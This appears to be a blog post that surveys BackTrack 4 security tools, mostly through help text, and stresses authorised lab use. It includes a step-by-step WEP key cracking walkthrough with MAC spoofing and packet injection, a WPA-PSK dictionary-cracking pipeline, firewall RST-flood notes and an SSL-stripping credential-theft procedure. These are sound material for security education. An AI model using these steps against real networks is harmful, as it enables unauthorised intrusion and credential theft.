In case you thought that most cracker attention was aimed at Layer 7 Applications, we will go over just a few tools available from BackTrack 4 that each Linux user, developer and professional needs to be aware of.
Backtrack4 is a linux security distribution that includes state of the art test tools for users, developers and administrators, as well as security pentest and reverse engineering professionals. Backtrack4 can now share the repositories with Ubuntu, since both are developed upon Debian base.
Many of the tools included within the Backtrack distribution are intentionally left in a semi-broken state to ensure use by professionals and pentesters who are assumed to be ethical by intelligence or experience. It is therefore suggested that a persistent USB key, VMware or full installation be used for network, administration and developer educational lab testing. Persistence allows tools to be repaired, ready for the next session.
As with all linux, reading all the documentation included in README files and carefully examining all the scripts in each of the directories will serve anyone wishing to learn more about the Backtrack4 collection of tools.
Command line skills cannot be stressed enough! This is the quick way to learn anything linux and absolutely required to use Backtrack4.
We all know administrators and developers that are still using IKE or host to host IPSec or an incorrectly configured VPN?
ike-scan discovers IKE hosts and can also fingerprint using the retransmission backoff pattern, supporting both main mode and aggressive mode.
Pskcrack, and nat-t as well as many other options: man ike-scan.
ike-scan does two things:
Discovery: Determine which hosts are running IKE. This is done by displaying those hosts which respond to the IKE requests sent by ike-scan.
Fingerprinting: Determine which IKE implementation the hosts are using. There are several ways to do this:
(a) Backoff fingerprinting
- recording the times of the IKE response packets from the target hosts and comparing the observed retransmission back‐off pattern against known patterns.
(b) vendor id fingerprinting
- matching the vendor-specific vendor IDs against known vendor ID patterns.
(c) proprietary notify message codes.
- recording the times of the IKE response packets from the target hosts and comparing the observed retransmission back-off pattern against known patterns.
(d) vendor id fingerprinting
- matching the vendor-specific vendor IDs against known vendor ID patterns; and proprietary notify message codes.
FILES:
/usr/share/ike-scan/ike-backoff-patterns
List of UDP backoff patterns. Used with:
--showbackoff
/usr/share/ike-scan/ike-vendor-ids
List of known Vendor ID patterns.
Need a nice map in a hurry, say to figure out a new network?
Creates a fine lanmap in png, gif or svg.
Usage: lanmap [options]
Options:
-v ...................... verbose mode, up to 3 levels (-vv, -vvv)
-i [?|*wildcard*|iface] . interface to use; 'all' for all
?: list all interfaces and exit
*3Com*: use the first NIC with "3Com" in it
-r # .................... generate a report every # seconds. default: 60
-D [#|all|raw] .......... debug mode, tons of output. use with caution.
#: payload bytes to dump (default: 0)
-f str .................. traffic filter; libpcap syntax
-T [png|gif|svg] ........ output image format (default: png)
-e program .............. program to run to generate graph (default: twopi)
-o directory ............ map destination (default ./)
-V ...................... program version info
-h ...................... this handy help message
Reverse raider is a domain scanner that uses brute force wordlist scanning for finding a target's subdomains or reverse resolution for a range of IPs.
Reverseraider was developed as part of the "Complemento" penetration testing tools that include LetDown and Httsquash. LetDown is a TCP flooder written after reading the Fyodor article "TCP Resource Exhaustion and Botched Disclosure". Httsquash is an HTTP server scanner, banner grabber, and data retriever. It can be used for scanning large ranges of IPs for finding devices or HTTP servers.
Usage:
reverseraider -d domain | -r range [options]
Options:
-r range of ipv4 or ipv6 addresses, for reverse scanning
examples: 208.67.1.1-254 or 2001:0DB8::1428:57ab-6344
-d domain, for wordlist scanning (example google.com)
-w wordlist file (see wordlists directory...)
Extra options:
-t max request time, in seconds
-P enable numeric permutation on wordlist (default off)
DISABLED: From menu drop to a shell leaves you in $HOME rather than in the pentest. Add full path. HINT:
SSLScan is a fast SSL port scanner. SSLScan connects to SSL
ports and determines what ciphers are supported, which are
the servers prefered ciphers, which SSL protocols are
supported and returns the SSL certificate. Client
certificates / private key can be configured and output is
to text / XML.
Command:
sslscan [Options] [host:port | host]
Options:
--targets= A file containing a list of hosts to
check. Hosts can be supplied with
ports (i.e. host:port).
--no-failed List only accepted ciphers (default
is to listing all ciphers).
--ssl2 Only check SSLv2 ciphers.
--ssl3 Only check SSLv3 ciphers.
--tls1 Only check TLSv1 ciphers.
--pk= A file containing the private key or
a PKCS#12 file containing a private
key/certificate pair (as produced by
MSIE and Netscape).
--pkpass= The password for the private key or
PKCS#12 file.
--certs= A file containing PEM/ASN1 formatted
client certificates.
--xml= Output results to an XML file.
--version Display the program version.
--help Display the help text you are now
reading.
SCTPscan is a new tool to scan SCTP endpoints. SCTP is a protocol like TCP with builtin support in major OS (Linux kernel 2.6, Solaris 10, FreeBSD 7, Mac OS X with kernel extension, ...). SCTP has some very interesting features (multihoming, multi-stream, resists well to Denial of Service - DoS, high performance). It's used for telecommunication backbone over IP (SS7 over IP aka SIGTRAN), Internet2 transfers, Cluster high-speed communication.
EXAMPLES:
Scan port 9999 on 192.168.1.24
./sctpscan -l 192.168.1.2 -r 192.168.1.24 -p 9999
Scans for availability of SCTP on 172.17.8.* and portscan any host with SCTP stack
This tool does NOT work behind most NAT (RFC-1918 private addresses). That means that most of the routers / firewalls don't know how to NAT SCTP packets. Use this tool from a computer having a public IP address.
This is a simple tool written for target enumeration during authorized penetration test engagements. This tool provides different methods for enumerating targets via DNS service.
USAGE:
ruby dnsrecon.rb
TYPES:
*** Reverse Lookup for Range ***
ruby dnsrecon.rb -r
*** Top Level Domain Expansion ***
ruby dnsrecon.rb -tld
*** DNS Host and Domain Bruteforce ***
ruby dnsrecon.rb -b
*** General DNS Query for NS, SOA and MX Records ***
ruby dnsrecon.rb -s
*** Execute Zone transfer on each NS server reported ***
ruby dnsrecon.rb -axfr
*** Enumerates most common SRV Records for a given domain ***
ruby dnsrecon.rb -srv
The Nemesis Project is designed to be a command line-based, portable human IP stack for UNIX-like and Windows systems. The suite is broken down by protocol and should allow for useful scripting of injected packets from simple shell scripts.
Run tcpdump on the other side of the firewall (on the 11.x network) to verify that the packets pass through the ruleset. The firewall should block packets because the TCP sequence numbers are wrong; nemesis assigns random #s. If packets pass through the firewall, a DoS attack could be performed against 11.0.0.27 by flooding with RST packets.
Check how the firewall handles ACK packets. Various cracker backdoor tools tunnel communication entirely over these packets.
We could target UDP connections, instead. Due to the connectionless nature of UDP, firewalls generally apply time limits on inactivity once a UDP connection has been established. You can verify the firewall UDP time limit with the nemesis udp tool using UDP port 135 (NetBIOS traffic). Establish a connection between 192.168.0.9 and 11.0.0.27 using netcat. Test a five-minute timeout by adding a sleep command; 300 seconds equals five minutes.
If your tcpdump session catches the UDP traffic, the traffic from nemesis udp has crossed the firewall so the firewall's timeout period is probably longer than five minutes.
Test the firewall reaction to ICMP tunneling programs such as Loki. Firewalls should never allow ICMP replies to any ICMP request originating from the wan side:
ICMPTX is a program that allows a user with root privledges to create a virtual network link between two computers, encapsulating data inside of ICMP packets.
UDPTunnel is a small program which can tunnel UDP packets bi-directionally over a TCP connection. Its primary purpose (and original motivation) is to allow multi-media conferences to traverse a firewall which allows only outgoing TCP connections.
Usage: udptunnel -s TCP-port [-r] [-v] UDP-addr/UDP-port[/ttl]
or udptunnel -c TCP-addr[/TCP-port] [-r] [-v] UDP-addr/UDP-port[/ttl]
-s: Server mode. Wait for TCP connections on the port.
-c: Client mode. Connect to the given address.
-r: RTP mode. Connect/listen on ports N and N+1 for both UDP and TCP.
Port numbers must be even.
-v: Verbose mode. Specify -v multiple times for increased verbosity.
Capture images from network traffic and display them in an X window.
Synopsis: driftnet [options] [filter code]
Options:
-h Display this help message.
-v Verbose operation.
-i interface Select the interface on which to listen (default: all
interfaces).
-p Do not put the listening interface into promiscuous mode.
-a Adjunct mode: do not display images on screen, but save
them to a temporary directory and announce their names on
standard output.
-m number Maximum number of images to keep in temporary directory
in adjunct mode.
-d directory Use the named temporary directory.
-x prefix Prefix to use when saving images.
-s Attempt to extract streamed audio data from the network,
in addition to images. At present this supports MPEG data
only.
-S Extract streamed audio but not images.
-M command Use the given command to play MPEG audio data extracted
with the -s option; this should process MPEG frames
supplied on standard input. Default: `mpg123 -'.
Filter code can be specified after any options in the manner of tcpdump(8). The filter code will be evaluated as `tcp and (user filter code)'
You can save images to the current directory by clicking on them.
Adjunct mode is designed to be used by other programs which want to use driftnet to gather images from the network. With the -m option, driftnet will silently drop images if more than the specified number of images are saved
in its temporary directory. It is assumed that some other process is collecting and deleting the image files.
Sidejacking actually sniffs the network traffic to extract the session-id from the HTTP cookies. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. With the session-id, you can gain access to the victim's account without the need of username and password.
1. Does an MITM on the HTTP connection
2. Replaces all the HTTPS links with HTTP ones but remembers the links which were changed
3. Communicates with the victim client on an HTTP connection for any secure link
4. Communicates with the legitimate server over HTTPS for the same secure link
5. Communication is transparently proxied between the victim client and the legitimate server
6. Images such as the favicon are replaced by images of the familiar "secure lock" icon, to build trust
7. As the MITM is taking places all passwords, credentials etc are stolen without the Client knowing
When you need to analyze a new network protocol for buffer overflows or similar weaknesses, the SPIKE is the tool of choice for professionals. While it requires a strong knowledge of C to use, it produces results second to none in the field. SPIKE is available for the Linux platform only.
* place your card in monitor mode
* (fake) authentication
* attack and collect IVs
* crack wep key from collected IVs
Cracking WEP EXAMPLE:
Use 3 shells
Stop the ath0 device:
# airmon-ng stop ath0
Find your device
# ifconfig -a
# ifconfig (device) down
# macchanger –mac 00:01:02:03:04:05 (device)
Start Wireless Card listening for AP’s
# airmon-ng start (device)
Dump the APs
# airodump-ng (device)
CTRL+C Copy bssid of consenting computer
# airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)
Lets make more data and start the injection process
# aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)
Inject the router: it takes a while to actually inject!
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)
Cracking the key
#aircrack-ng -n 64 –bssid (bssid) Exidous-01.cap
Write Down the wep key and reboot to windows.
Now put it in the username and the password without the :
IE: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930
cowpatty: Must supply a list of passphrases in a file with -f or a hash file with -d. Use "-f -" to accept words on stdin.
Usage: cowpatty [options]
-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit
EXAMPLE: Cowpatty cracking a wpa-psk key in 1/2 hour
This tool can also accept dictionary words from STDIN, allowing us to utilize a tool such as John the Ripper to create lots of word permutations from a dictionary file:
$ john -wordfile:dictfile -rules -session:johnrestore.dat -stdout:63 | \
cowpatty -r eap-test.dump -f - -s somethingclever
Forensics:
Need to do low level analysis of an encroached system's dd image? Be sure to take full snapshots of all running processes and memory stack first!
Other than hexedit and other binary discovery tools, autopsy is excellent.
usage: /usr/bin/autopsy [-c] [-C] [-d evid_locker] [-p port] [remoteaddr]
-c: force a cookie in the URL
-C: force NO cookie in the URL
-d dir: specify the evidence locker directory
-i device filesystem mnt: Specify info for live analysis
-p port: specify the server port (default: 9999)
remoteaddr: specify the host with the browser (default: localhost)
Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. Metasploit is a community project managed by Metasploit LLC.
BeEF is the browser exploitation framework.Current modules include the first public Inter-protocol Exploit, a traditional browser overflow exploit, port scanning, keylogging, clipboard theft and more. The modules are aimed to be a representative set of current browser attacks - with the notable exception of launching cross-site scripting viruses.
Other services pre-configured from the KDE Menu include Mysql, tftpd, VNC, GPSD, PCSCD, ssh, HTTPD. A fully functional wine makes running windows test, repair or recovery tools trivial:
These are just a few of the fun toys available on the Backtrack4 disto. Offensive Security provides good documentation:
These are only preliminary examples; your discovery via command line, package documentation, and testing will be significantly richer.
Any modern linux professional, developer and user would do well to educate themselves properly regarding security. Backtrack4 can swiftly provide a good review of the list of OSI "layer up" threats, while demonstrating Application "layer down" web and browser issues to good effect. If Offensive Security does nothing but inform everyone of the ease with which our systems can be exploited, their mission would be worth a donation.
Use of any or all of these tools without a signed pentesting agreement, outside a lab or test environment, can be considered aggressive attempts to exploit secure systems. A sizable NSA federal budget exists to tap networks and target crackers. Anyone using any of these tools for destructive purposes fully deserves placement in the back page of 2600.com magazine's free advertisements for "pen pals from jail". Not everyone gets the Mitnick treatment after parole.
Visit your local user groups or start your own educational testing in controlled settings. Join me at the Phoenix Linux Users Group HackFests.
